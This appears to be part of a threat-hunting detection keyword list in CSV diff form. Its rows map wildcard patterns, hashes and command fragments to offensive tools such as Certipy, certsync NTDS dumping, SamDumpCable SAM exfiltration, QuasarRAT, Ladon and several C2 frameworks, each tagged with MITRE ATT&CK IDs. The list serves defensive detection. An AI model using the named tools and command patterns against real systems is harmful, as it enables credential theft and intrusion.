+"*cd40dbcdae84b1c8606f29342066547069ed5a33*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z"
+"*cdimage.kali.org/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cdn_proxy cloudflare ","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","","","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*cdn_proxy_burp_ext.py*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*cdn-proxy -*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*cdn-proxy cloudfront *","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*cdn-proxy.git*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin 
access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*cdn-proxy/burp_extension*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*Cdn-Proxy-Host*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*Cdn-Proxy-Origin*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*cdn-scanner -*","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","213","25","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z"
+"*CE895D82-85AA-41D9-935A-9625312D87D0*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and 
implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*celerystalk*","offensive_tool_keyword","celerystalk","celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.","T1046 - T1057 - T1082 - T1087 - T1069","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/sethsec/celerystalk","1","0","N/A","N/A","4","389","75","2021-03-24T01:23:11Z","2018-08-13T04:21:37Z" +"*cerbrutus.py*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*Cerbrutus-BruteForcer*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. 
Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z" +"*cert*responder.crt*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*cert*responder.key*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*certi.py_vulntemplates_output*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*certi_py_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Certify.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*certipy account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy auth *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy ca -backup*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy cert *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 
T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy find *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy find *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy forge *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy relay *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy relay -ca *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - 
?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*certipy req *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy req -username *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*certipy shadow *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy template *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"*certipy_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*certipy-master.zip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","1","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"*CertStealer.csproj*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z"
+"*CertStealer.exe*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z"
+"*CertStealer.sln*","offensive_tool_keyword","CertStealer","A .NET tool for exporting and importing certificates without touching disk.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TheWover/CertStealer","1","1","N/A","N/A","5","450","67","2021-10-08T20:48:34Z","2021-04-21T14:20:56Z"
+"*certsync *--dc-ip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z"
+"*certsync -u *","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z"
+"*certsync -u * -p *-d * -ca-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*certsync_ntds_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*certsync-master.zip*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z"
+"*cewl --depth * --with-numbers -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*CFCD0759E20F29C399C9D4210BE614E4E020BEE8*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z"
+"*cfprefsd_race_condition*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*cGlpLmZkYS5nb3Y=*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*cGlwZW5hbWU9*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z"
+"*cgojmfochfikphincbhokimmmjenhhgk*","greyware_tool_keyword","Whoer VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Chachi-Enumerator.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*ChaitanyaHaritash/kimi*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*chameleon.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*changepasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*change-windows10-mac-address.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z"
+"*charlesnathansmith/whatlicense*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
+"*charles-proxy*","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*charlotte-main.zip*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"*ChatLadon.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*ChatLadon.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*check_all*.c*","offensive_tool_keyword","CheckPlease","c project from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
+"*check_all*.go*","offensive_tool_keyword","CheckPlease","go script from checkplease checking stuffs. This repository is for defenders to harden their sandboxes and AV tools. malware researchers to discover new techniques. and red teamers to get serious about their payloads. ","T1497 - T1027 - T1055 - T1059","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/Arvanaghi/CheckPlease","1","0","N/A","N/A","9","861","187","2021-06-01T15:06:44Z","2017-03-13T22:51:30Z"
